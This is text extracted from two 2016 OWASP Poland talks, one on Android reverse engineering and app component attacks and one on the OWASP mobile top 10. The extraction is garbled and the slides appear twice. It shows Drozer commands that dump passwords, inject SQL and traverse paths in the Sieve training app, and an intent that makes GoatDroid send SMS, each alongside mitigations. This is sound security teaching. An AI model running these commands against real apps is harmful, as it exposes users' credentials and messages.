id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
